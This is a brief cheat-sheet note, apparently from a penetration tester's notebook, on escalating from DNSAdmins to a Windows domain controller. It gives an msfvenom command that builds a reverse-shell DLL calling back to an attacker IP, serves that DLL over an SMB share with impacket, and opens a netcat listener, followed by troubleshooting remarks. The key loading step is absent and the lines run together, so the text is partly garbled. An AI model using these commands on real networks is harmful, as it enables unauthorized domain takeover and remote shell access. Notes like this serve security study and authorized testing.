DNSAdmin Escalation
https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/
whoami /all#making the payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.211.55.13 LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll#serving the file using SMB Server using smbserver.py, that comes with Python3-Impacket.
cd /usr/share/doc/python3-impacket/examples
./smbserver.py SHARE ~/windows/privesc/nc -nvlp 4444Comment: Change domain.local to IP - when RPC Error 1772. Found that fqdn didnt work, the ip of the dns server worked a treat.
Observation: access denied to restarting dns service prior to successfully running the above command.
Last updated